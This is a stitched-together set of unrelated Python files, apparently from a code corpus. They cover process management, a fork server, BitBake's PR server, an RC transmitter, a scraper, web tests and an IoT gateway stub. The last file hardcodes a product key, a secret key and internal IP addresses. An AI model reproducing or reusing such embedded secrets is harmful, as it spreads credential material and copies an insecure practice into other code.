'Some processes failed to respect the KILL signal: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.info('kill_children retries left: %s', available_retries)
kwargs['retry'] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
'Failed to kill the following processes: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.warning(
'Salt will either fail to terminate now or leave some '
'zombie processes behind'
)
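# A minimal usage sketch for ProcessManager (not part of the original
# module); `some_target` stands in for any callable or Process subclass:
#
#   manager = ProcessManager(name='ExampleManager', wait_for_kill=2)
#   manager.add_process(some_target, args=[1, 2])
#   manager.run()  # blocks, restarting children that die, until interrupted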
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __new__(cls, *args, **kwargs):
instance = super(MultiprocessingProcess, cls).__new__(cls)
# Patch the run method at runtime because decorating the run method
# with a function with a similar behavior would be ignored once this
# class's run method is overridden.
instance._original_run = instance.run
instance.run = instance._run
return instance
def __init__(self, *args, **kwargs):
if (salt.utils.is_windows() and
not hasattr(self, '_is_child') and
self.__setstate__.__code__ is
MultiprocessingProcess.__setstate__.__code__):
# On Windows, if a derived class hasn't defined __setstate__, that
# means the 'MultiprocessingProcess' version will be used. For this
# version, save a copy of the args and kwargs to use with its
# __setstate__ and __getstate__.
# We do this so that __init__ will be invoked on Windows in the
# child process so that a register_after_fork() equivalent will
# work on Windows. Note that this will only work if the derived
# class uses the exact same args and kwargs as this class. Hence
# this will also work for 'SignalHandlingMultiprocessingProcess'.
# However, many derived classes take params that they don't pass
# down (eg opts). Those classes need to override __setstate__ and
# __getstate__ themselves.
self._args_for_getstate = copy.copy(args)
self._kwargs_for_getstate = copy.copy(kwargs)
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
else:
# Set the logging queue so that it can be retrieved later with
# salt.log.setup.get_multiprocessing_logging_queue().
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
# Call __init__ from 'multiprocessing.Process' only after removing
# 'log_queue' from kwargs.
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
# On Windows, the multiprocessing.Process object is reinitialized
# in the child process via the constructor. Due to this, methods
# such as ident() and is_alive() won't work properly. So we use
# our own attribute '_is_child' for this purpose.
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_process_logging() directly.
self.__setup_process_logging()
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
else:
multiprocessing.util.register_after_fork(
self,
MultiprocessingProcess.__setup_process_logging
)
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
args = state['args']
kwargs = state['kwargs']
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
def __getstate__(self):
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if 'log_queue' not in kwargs:
kwargs['log_queue'] = self.log_queue
# Remove the version of these in the parent process since
# they are no longer needed.
del self._args_for_getstate
del self._kwargs_for_getstate
return {'args': args,
'kwargs': kwargs}
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
def _run(self):
try:
return self._original_run()
except SystemExit:
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception as exc:
log.error(
'An un-handled exception from the multiprocessing process '
'\'%s\' was caught:\n', self.name, exc_info=True)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_signals() directly.
self.__setup_signals()
else:
multiprocessing.util.register_after_fork(
self,
SignalHandlingMultiprocessingProcess.__setup_signals
)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
sys.exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
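# A minimal sketch (not part of the original module) of the pattern used
# above in add_process() and SignalHandlingMultiprocessingProcess.start():
# temporarily restore SIG_DFL so a child spawned inside the block does not
# inherit custom handlers; `some_target` is a hypothetical callable:
#
#   with default_signals(signal.SIGINT, signal.SIGTERM):
#       proc = multiprocessing.Process(target=some_target)
#       proc.start()
#   # the parent's original SIGINT/SIGTERM handlers are restored here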
|
kernel.py | #!/usr/bin/env python3
#!/usr/bin/python3.8
# OpenCV 4.2, Raspberry Pi 3/3b/4b - tested on macOS
from camera.camera_async import CameraAsync
from camera.frame import Frame
from camera.record import Record
from camera.streaming import Streaming
from camera.type_cam import TypeCam
from dto.record import RecordDTO
from threading import Thread
class Kernel:
def __init__(self, src=0):
super().__init__()
self.src = src
self.__CAMERA = CameraAsync(src=self.src, name=str(self.src))
self.started = False
def __build__(self):
width, height = self.__CAMERA.get_dimentions()
self.__FRAME = Frame()
self.__RECORD = Record(width, height)
#self.__STREAMING = Streaming()
def initialize(self):
self.__CAMERA.initialize()
self.__CAMERA.start()
self.__build__()
self.start()
def stop(self, src=0) -> None:
self.__CAMERA.stop()
self.started = False
def start(self) -> None:
if self.started:
return
self.started = True
#self.thread = Thread(target=self.__update, args=(), daemon=True)
#self.thread.start()
def __update(self) -> None:
while self.started:
try:
pass
#grabbed1, frame1, grabbed2, frame2 = self.__CAMERA.read()
#if frame1 is None or frame2 is None:
# continue
#grabbed, frame, is_mov = self.__FRAME.get_frame_normal(frame1, frame2)
#_, jpg = self.__FRAME.get_stream_to_image(frame)
#_r = RecordDTO(self.src, TypeCam.NORMAL, is_mov, frame, jpg)
#self.__RECORD.put_nowait(_r)
#self.__STREAMING.put_nowait(_r)
except Exception as e:
print(e)
|
updateIndex.py | import time
import os
import threading
def generateIndex(cwd, date):
f = open(os.path.join(cwd, "mesAct", "index.html"), 'w')
messageList = ""
for i in range(1, 32):
messageList += """
<li class="list-group-item"><a href="./messages_"""+str(i).center(2, "0")+"""{0}.html" class="stretched-link">messages_"""+str(i).center(2, "0")+"""{0}.html</a></li>"""
f.write(("""<!--{0}-->
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1"/>
<link rel="stylesheet" href="./bootstrap.css">
</head>
<body>
<ul class="list-group">"""+messageList+"""
</ul>
<script>
list = document.getElementsByTagName("li")
var now = new Date().getDate()
for (i = 30; i >= now; i--) list[i].setAttribute("hidden","");
</script>
</body>
</html>""").format(date))
f.close()
class indexUpdater:
def updateIndex(self, cwd, standalone=0):
date = time.strftime("%m%y", time.localtime())
if standalone == 1:
generateIndex(cwd, date)
elif standalone == 0:
while True:
if not os.path.exists(os.path.join(cwd, "mesAct", "index.html")):
generateIndex(cwd, date)
else:
f = open(os.path.join(cwd, "mesAct", "index.html"), 'r')
prevDate = f.read()[4:8]  # the MMYY stamp inside the leading <!--MMYY--> comment
f.close()
if prevDate != date:
generateIndex(cwd, date)
time.sleep(86400)
def __init__(self, standalone=0):
cwd = os.path.dirname(os.path.abspath(__file__))
threading.Thread(target=self.updateIndex, args=(cwd, standalone,)).start()
if __name__ == "__main__":
indexUpdater(1)
|
simple_fork.py | import multiprocessing
import select
import socket
from time import time
from qactuar import ASGIApp, Config
from qactuar.processes.simple_fork import make_child
from qactuar.servers.base import BaseQactuarServer
class SimpleForkServer(BaseQactuarServer):
def __init__(
self,
host: str = None,
port: int = None,
app: ASGIApp = None,
config: Config = None,
):
super().__init__(host, port, app, config)
self.time_last_cleaned_processes: float = time()
def serve_forever(self) -> None:
self.start_up()
try:
while True:
self.select_socket()
self.check_processes()
except KeyboardInterrupt:
self.shut_down()
except Exception as err:
self.exception_log.exception(err)
self.shut_down()
def select_socket(self) -> None:
ready_to_read, _, _ = select.select(
[self.listen_socket], [], [], self.config.SELECT_SLEEP_TIME
)
if ready_to_read:
accepted_socket = self.accept_client_connection()
if accepted_socket:
self.fork(accepted_socket)
def fork(self, client_socket: socket.socket) -> None:
process = multiprocessing.Process(target=make_child, args=(self, client_socket))
process.daemon = True
try:
process.start()
except AttributeError as err:
self.exception_log.exception(err)
self.server_log.warning(f"Could not start process {process.ident}")
else:
ident = process.ident
if ident:
self.processes[ident] = process
def check_processes(self) -> None:
current_time = time()
last_time = self.time_last_cleaned_processes
if current_time - last_time > 1:
self.time_last_cleaned_processes = current_time
for ident, process in list(self.processes.items()):
if not process.is_alive():
process.close()
del self.processes[ident]
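# A minimal usage sketch (not part of the original module); the host, port
# and app values below are assumptions:
#
#   if __name__ == "__main__":
#       server = SimpleForkServer(host="127.0.0.1", port=8000, app=my_asgi_app)
#       server.serve_forever()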
|
remotecontroltransmitter.py | # Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import json
import socket
import time
from threading import Thread
from multiprocessing import Pipe
from src.utils.remotecontrol.rcbrain import RcBrain
from src.utils.remotecontrol.keyboardlistener import KeyboardListener
from src.utils.templates.workerprocess import WorkerProcess
class RemoteControlTransmitter(Thread):
# ===================================== INIT==========================================
def __init__(self, inPs = [], outPs = []):
"""Remote controller transmitter. This should run on your PC.
"""
super(RemoteControlTransmitter,self).__init__()
# Can be changed to a multithreaded Queue.
self.lisBrR, self.lisBrS = Pipe(duplex=False)
self.rcBrain = RcBrain()
self.listener = KeyboardListener([self.lisBrS])
self.port = 12244
self.serverIp = '192.168.43.237'
self.threads = list()
# ===================================== RUN ==========================================
def run(self):
"""Apply initializing methods and start the threads.
"""
self._init_threads()
self._init_socket()
for th in self.threads:
th.start()
for th in self.threads:
th.join()
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the command sender thread for transmite the receiver process all commands.
"""
self.listener.daemon = self.daemon
self.threads.append(self.listener)
sendTh = Thread(name = 'SendCommand',target = self._send_command_thread, args=(self.lisBrR, ),daemon=self.daemon)
self.threads.append(sendTh)
# ===================================== INIT SOCKET ==================================
def _init_socket(self):
"""Initialize the socket for communication with remote client.
"""
self.client_socket = socket.socket(
family = socket.AF_INET,
type = socket.SOCK_DGRAM
)
# ===================================== SEND COMMAND =================================
def _send_command_thread(self, inP):
"""Transmite the command to the remotecontrol receiver.
Parameters
----------
inP : Pipe
Input pipe.
"""
move=True
#if move:
while True:
key = inP.recv()
command = self.rcBrain.getMessage(key)
command = json.dumps(command).encode()
size = len(command)
self.client_socket.sendto(command,(self.serverIp,self.port))
#command = self.rcBrain.getMessage(key)
# command = self.rcBrain.specMotion(25.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(1.5)
# command = self.rcBrain.specMotion(-20.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(0.1)
# command = self.rcBrain.specMotion(0.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(5)
# command = self.rcBrain.specMotion(-25.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(1.4)
# command = self.rcBrain.specMotion(20.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(0.1)
# command = self.rcBrain.specMotion(0.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(5)
|
serv.py | import os,sys,logging
import signal, time
from SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
import threading
import Queue
import socket
import StringIO
try:
import sqlite3
except ImportError:
from pysqlite2 import dbapi2 as sqlite3
import bb.server.xmlrpc
import prserv
import prserv.db
import errno
logger = logging.getLogger("BitBake.PRserv")
if sys.hexversion < 0x020600F0:
print("Sorry, python 2.6 or later is required.")
sys.exit(1)
class Handler(SimpleXMLRPCRequestHandler):
def _dispatch(self,method,params):
try:
value=self.server.funcs[method](*params)
except:
import traceback
traceback.print_exc()
raise
return value
PIDPREFIX = "/tmp/PRServer_%s_%s.pid"
singleton = None
class PRServer(SimpleXMLRPCServer):
def __init__(self, dbfile, logfile, interface, daemon=True):
''' constructor '''
try:
SimpleXMLRPCServer.__init__(self, interface,
logRequests=False, allow_none=True)
except socket.error:
ip=socket.gethostbyname(interface[0])
port=interface[1]
msg="PR Server unable to bind to %s:%s\n" % (ip, port)
sys.stderr.write(msg)
raise PRServiceConfigError
self.dbfile=dbfile
self.daemon=daemon
self.logfile=logfile
self.working_thread=None
self.host, self.port = self.socket.getsockname()
self.pidfile=PIDPREFIX % (self.host, self.port)
self.register_function(self.getPR, "getPR")
self.register_function(self.quit, "quit")
self.register_function(self.ping, "ping")
self.register_function(self.export, "export")
self.register_function(self.dump_db, "dump_db")
self.register_function(self.importone, "importone")
self.register_introspection_functions()
self.requestqueue = Queue.Queue()
self.handlerthread = threading.Thread(target = self.process_request_thread)
self.handlerthread.daemon = False
def process_request_thread(self):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
iter_count = 1
# 60 iterations between syncs or sync if dirty every ~30 seconds
iterations_between_sync = 60
bb.utils.set_process_name("PRServ Handler")
while not self.quit:
try:
(request, client_address) = self.requestqueue.get(True, 30)
except Queue.Empty:
self.table.sync_if_dirty()
continue
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
iter_count = (iter_count + 1) % iterations_between_sync
if iter_count == 0:
self.table.sync_if_dirty()
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
self.table.sync()
self.table.sync_if_dirty()
def sigint_handler(self, signum, stack):
if self.table:
self.table.sync()
def sigterm_handler(self, signum, stack):
if self.table:
self.table.sync()
self.quit=True
def process_request(self, request, client_address):
self.requestqueue.put((request, client_address))
def export(self, version=None, pkgarch=None, checksum=None, colinfo=True):
try:
return self.table.export(version, pkgarch, checksum, colinfo)
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def dump_db(self):
"""
Returns a script (string) that reconstructs the state of the
entire database at the time this function is called. The script
language is defined by the backing database engine, which is a
function of server configuration.
Returns None if the database engine does not support dumping to
script or if some other error is encountered in processing.
"""
buff = StringIO.StringIO()
try:
self.table.sync()
self.table.dump_db(buff)
return buff.getvalue()
except Exception as exc:
logger.error(str(exc))
return None
finally:
buff.close()
def importone(self, version, pkgarch, checksum, value):
return self.table.importone(version, pkgarch, checksum, value)
def ping(self):
return not self.quit
def getinfo(self):
return (self.host, self.port)
def getPR(self, version, pkgarch, checksum):
try:
return self.table.getValue(version, pkgarch, checksum)
except prserv.NotFoundError:
logger.error("can not find value for (%s, %s)",version, checksum)
return None
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def quit(self):
self.quit=True
return
def work_forever(self,):
self.quit = False
self.timeout = 0.5
bb.utils.set_process_name("PRServ")
# DB connection must be created after all forks
self.db = prserv.db.PRData(self.dbfile)
self.table = self.db["PRMAIN"]
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(os.getpid())))
self.handlerthread.start()
while not self.quit:
self.handle_request()
self.handlerthread.join()
self.db.disconnect()
logger.info("PRServer: stopping...")
self.server_close()
return
def start(self):
if self.daemon:
pid = self.daemonize()
else:
pid = self.fork()
# Ensure both the parent sees this and the child from the work_forever log entry above
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(pid)))
def delpid(self):
os.remove(self.pidfile)
def daemonize(self):
"""
See Advanced Programming in the UNIX Environment, Sec. 13.3
"""
try:
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
#parent return instead of exit to give control
return pid
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
os.setsid()
"""
fork again to make sure the daemon is not session leader,
which prevents it from acquiring controlling terminal
"""
try:
pid = os.fork()
if pid > 0: #parent
os._exit(0)
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
self.cleanup_handles()
os._exit(0)
def fork(self):
try:
pid = os.fork()
if pid > 0:
return pid
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
bb.utils.signal_on_parent_exit("SIGTERM")
self.cleanup_handles()
os._exit(0)
def cleanup_handles(self):
signal.signal(signal.SIGINT, self.sigint_handler)
signal.signal(signal.SIGTERM, self.sigterm_handler)
os.chdir("/")
sys.stdout.flush()
sys.stderr.flush()
si = open('/dev/null', 'r')
so = open(self.logfile, 'a+')
se = so
os.dup2(si.fileno(),sys.stdin.fileno())
os.dup2(so.fileno(),sys.stdout.fileno())
os.dup2(se.fileno(),sys.stderr.fileno())
# Clear out all log handlers prior to the fork() to avoid calling
# event handlers not part of the PRserver
for logger_iter in logging.Logger.manager.loggerDict.keys():
logging.getLogger(logger_iter).handlers = []
# Ensure logging makes it to the logfile
streamhandler = logging.StreamHandler()
streamhandler.setLevel(logging.DEBUG)
formatter = bb.msg.BBLogFormatter("%(levelname)s: %(message)s")
streamhandler.setFormatter(formatter)
logger.addHandler(streamhandler)
# write pidfile
pid = str(os.getpid())
pf = open(self.pidfile, 'w')
pf.write("%s\n" % pid)
pf.close()
self.work_forever()
self.delpid()
class PRServSingleton(object):
def __init__(self, dbfile, logfile, interface):
self.dbfile = dbfile
self.logfile = logfile
self.interface = interface
self.host = None
self.port = None
def start(self):
self.prserv = PRServer(self.dbfile, self.logfile, self.interface, daemon=False)
self.prserv.start()
self.host, self.port = self.prserv.getinfo()
def getinfo(self):
return (self.host, self.port)
class PRServerConnection(object):
def __init__(self, host, port):
if is_local_special(host, port):
host, port = singleton.getinfo()
self.host = host
self.port = port
self.connection, self.transport = bb.server.xmlrpc._create_server(self.host, self.port)
def terminate(self):
try:
logger.info("Terminating PRServer...")
self.connection.quit()
except Exception as exc:
sys.stderr.write("%s\n" % str(exc))
def getPR(self, version, pkgarch, checksum):
return self.connection.getPR(version, pkgarch, checksum)
def ping(self):
return self.connection.ping()
def export(self,version=None, pkgarch=None, checksum=None, colinfo=True):
return self.connection.export(version, pkgarch, checksum, colinfo)
def dump_db(self):
return self.connection.dump_db()
def importone(self, version, pkgarch, checksum, value):
return self.connection.importone(version, pkgarch, checksum, value)
def getinfo(self):
return self.host, self.port
def start_daemon(dbfile, host, port, logfile):
ip = socket.gethostbyname(host)
pidfile = PIDPREFIX % (ip, port)
try:
pf = open(pidfile, 'r')
pid = int(pf.readline().strip())
pf.close()
except IOError:
pid = None
if pid:
sys.stderr.write("pidfile %s already exist. Daemon already running?\n"
% pidfile)
return 1
server = PRServer(os.path.abspath(dbfile), os.path.abspath(logfile), (ip,port))
server.start()
# Sometimes the port indicated by the user (i.e. localhost:0) does not match
# the one the server is actually listening on, so at least warn the user about it
_,rport = server.getinfo()
if port != rport:
sys.stdout.write("Server is listening at port %s instead of %s\n"
% (rport,port))
return 0
def stop_daemon(host, port):
import glob
ip = socket.gethostbyname(host)
pidfile = PIDPREFIX % (ip, port)
try:
pf = open(pidfile, 'r')
pid = int(pf.readline().strip())
pf.close()
except IOError:
pid = None
if not pid:
# when the server starts at port=0 (i.e. localhost:0), it actually takes another port,
# so at least advise the user which ports the corresponding server is listening on
ports = []
portstr = ""
for pf in glob.glob(PIDPREFIX % (ip,'*')):
bn = os.path.basename(pf)
root, _ = os.path.splitext(bn)
ports.append(root.split('_')[-1])
if len(ports):
portstr = "Wrong port? Other ports listening at %s: %s" % (host, ' '.join(ports))
sys.stderr.write("pidfile %s does not exist. Daemon not running? %s\n"
% (pidfile,portstr))
return 1
try:
PRServerConnection(ip, port).terminate()
except:
logger.critical("Stop PRService %s:%d failed" % (host,port))
try:
if pid:
wait_timeout = 0
print("Waiting for pr-server to exit.")
while is_running(pid) and wait_timeout < 50:
time.sleep(0.1)
wait_timeout += 1
if is_running(pid):
print("Sending SIGTERM to pr-server.")
os.kill(pid,signal.SIGTERM)
time.sleep(0.1)
if os.path.exists(pidfile):
os.remove(pidfile)
except OSError as e:
err = str(e)
if err.find("No such process") <= 0:
raise e
return 0
def is_running(pid):
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
return False
return True
def is_local_special(host, port):
return host.strip().lower() == 'localhost' and not port
class PRServiceConfigError(Exception):
pass
def auto_start(d):
global singleton
host_params = filter(None, (d.getVar('PRSERV_HOST', True) or '').split(':'))
if not host_params:
return None
if len(host_params) != 2:
logger.critical('\n'.join(['PRSERV_HOST: incorrect format',
'Usage: PRSERV_HOST = "<hostname>:<port>"']))
raise PRServiceConfigError
if is_local_special(host_params[0], int(host_params[1])) and not singleton:
import bb.utils
cachedir = (d.getVar("PERSISTENT_DIR", True) or d.getVar("CACHE", True))
if not cachedir:
logger.critical("Please set the 'PERSISTENT_DIR' or 'CACHE' variable")
raise PRServiceConfigError
bb.utils.mkdirhier(cachedir)
dbfile = os.path.join(cachedir, "prserv.sqlite3")
logfile = os.path.join(cachedir, "prserv.log")
singleton = PRServSingleton(os.path.abspath(dbfile), os.path.abspath(logfile), ("localhost",0))
singleton.start()
if singleton:
host, port = singleton.getinfo()
else:
host = host_params[0]
port = int(host_params[1])
try:
connection = PRServerConnection(host,port)
connection.ping()
realhost, realport = connection.getinfo()
return str(realhost) + ":" + str(realport)
except Exception:
logger.critical("PRservice %s:%d not available" % (host, port))
raise PRServiceConfigError
def auto_shutdown(d=None):
global singleton
if singleton:
host, port = singleton.getinfo()
try:
PRServerConnection(host, port).terminate()
except:
logger.critical("Stop PRService %s:%d failed" % (host,port))
singleton = None
def ping(host, port):
conn=PRServerConnection(host, port)
return conn.ping()
|
scrape.py | import requests as r
from json import loads, dumps
from os import mkdir, chdir, listdir, getcwd
import threading
from sys import argv
class Parse:
def __init__(self, data: str):
self.data = loads(data)
def refine(self) -> str:
data = []
for item in self.data['data']:
del item['id']
data.append(item)
return dumps(data, indent = 1)
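# A small sketch (not part of the original module) of what refine() does:
# it strips the 'id' field from every question record and re-serializes
# the remaining list with indent=1:
#
#   raw = '{"data": [{"id": 7, "question": "2+2?", "answer": "4"}]}'
#   Parse(raw).refine()  # -> JSON list containing only question/answer keys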
def info(year: int, subject: str):
url = 'https://questions.aloc.ng/api/m?subject={}&year={}'.format(subject, year)
data = r.get(url)
data = Parse(data.content.decode('utf-8')).refine()
f = open(subject + '/' + str(year) + '.json', 'w')
f.write(data)
f.close()
if __name__ == '__main__':
subject = []
year = int(input('year to scrape from\n'))
# argv always contains the script name, so check for actual arguments
if len(argv) > 1:
del argv[0]
subject = list(argv)
for item in subject:
    if item not in listdir(getcwd()):
        mkdir(item)
    # scrape each year for this subject on its own thread
    for index, y in enumerate(range(2001, year)):
        print('thread', index, 'started for', item)
        x = threading.Thread(target=info, args=(y, item), daemon=False)
        x.start()
        #x.join()
|
test_aiowebsocket.py | import time
import pytest
import asyncio
import threading
import contextlib
import urllib.parse
import urllib.request
import aiohttp
from flask import Flask, request
from websocket import WebSocket
from werkzeug.debug import DebuggedApplication
from .. import AioHTTP, wrap_wsgi_middleware, async, websocket
class Server(contextlib.ContextDecorator):
def __init__(self, app: Flask, aio: AioHTTP, *,
host='127.0.0.1', port=0):
super().__init__()
self.app = app
self.aio = aio
self.host = host
self.port = port
self.loop = asyncio.get_event_loop()
self._server = None
self.condition = threading.Condition(threading.Lock())
def start(self):
# Wrap WSGI app with werkzeug debugger.
self.app.wsgi_app = wrap_wsgi_middleware(DebuggedApplication)(
self.app.wsgi_app)
thread = threading.Thread(target=self.run)
thread.start()
def stop(self):
self.loop.call_soon_threadsafe(self.loop.stop)
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
time.sleep(0.001) # For bypassing unknown exception at stopping loop.
self.stop()
@property
def server(self):
with self.condition:
if self._server is None:
self.condition.wait()
return self._server
@server.setter
def server(self, server):
with self.condition:
self._server = server
if server is not None:
self.condition.notify_all()
def run(self):
asyncio.set_event_loop(self.loop)
# Create coroutine
coroutine = self.loop.create_server(
self.app.aiohttp_app.make_handler(), self.host, self.port)
# Get server
server = self.loop.run_until_complete(coroutine)
self.server = server
# Run until `stop()`
self.loop.run_forever()
@property
def address(self):
#: :type: socket.socket
sock = self.server.sockets[0]
return '{}:{}'.format(*sock.getsockname())
@property
def base_url(self):
return 'http://' + self.address
@property
def ws_base_url(self):
return 'ws://' + self.address
def ws_url(self, path, **params):
url = self.ws_base_url + path
if params:
url += '?' + urllib.parse.urlencode(params)
return url
def url(self, path, **params):
url = self.base_url + path
if params:
url += '?' + urllib.parse.urlencode(params)
return url
def request(self, method, path, params=None):
r = urllib.request.Request(self.url(path, **params),
method=method.upper())
with urllib.request.urlopen(r) as response:
return response.read().decode('utf-8')
def get(self, path, **kwargs):
return self.request('GET', path, params=kwargs)
@pytest.fixture
def app():
app = Flask(__name__)
return app
@pytest.fixture
def aio(app: Flask):
return AioHTTP(app)
def test_flask(app: Flask, aio: AioHTTP):
"""Test for checking flask working find"""
@app.route('/foo')
def foo():
return 'foo'
@app.route('/bar')
def bar():
def stream():
yield 'bar'
return app.response_class(stream())
with Server(app, aio) as server:
assert 'foo' == server.get('/foo')
assert 'bar' == server.get('/bar')
def test_async(app: Flask, aio: AioHTTP):
"""Test for asynchronous I/O in Flask view"""
@app.route('/foo')
def foo():
return 'foo'
@app.route('/lazy-foo')
@async
def lazy_foo():
response = yield from aiohttp.request('GET', request.host_url + 'foo')
data = yield from response.read()
return data
@app.route('/streaming-foo')
@async
def streaming_foo():
response = yield from aiohttp.request('GET', request.host_url + 'foo')
data = yield from response.read()
def stream():
yield data
return app.response_class(stream())
with Server(app, aio) as server:
assert 'foo' == server.get('/foo')
assert 'foo' == server.get('/lazy-foo')
assert 'foo' == server.get('/streaming-foo')
def test_websocket(app: Flask, aio: AioHTTP):
"""Test for websocket"""
@app.route('/echo')
@websocket
def echo():
while True:
msg = yield from aio.ws.receive_msg()
if msg.tp == aiohttp.MsgType.text:
aio.ws.send_str(msg.data)
elif msg.tp == aiohttp.MsgType.close:
break
elif msg.tp == aiohttp.MsgType.error:
break
with Server(app, aio) as server:
ws = WebSocket()
ws.connect(server.ws_url('/echo'))
try:
ws.send('foo')
assert 'foo' == ws.recv()
finally:
ws.close()
def test_request_hook(app: Flask, aio: AioHTTP):
"""Test for Flask request hook"""
@app.before_request
def before_request():
request.foo = []
request.foo.append('a')
@app.after_request
def after_request(response):
request.foo.append('c')
return response
@app.teardown_request
def teardown_request(exc):
request.foo.append('d')
@app.route('/hook')
@async
def hook():
request.foo.append('b')
return ''.join(request.foo)
with Server(app, aio) as server:
assert 'ab' == server.get('/hook')
|
iot_gateway.py | import time, random
import requests, json
import uuid, hashlib, hmac
import paho.mqtt.client as mqtt
from threading import Thread
from datetime import datetime
DEVICE_NO = '02-0000b5'
PRODUCT_KEY = 'A4MU33FGXY4URY6Z'
CLOUD_PASSWORD =''
SECRET_KEY = 'a234d8152d2f6ef163baa68acbfb5db0'
GATEWAY_URL = 'http://192.168.85.138:8080'
CLOUD_URL = 'http://192.168.83.166:8088/cloud-web-api'
# Scan URLs
url_w_get_dev_list = "/light_w/dev_list"
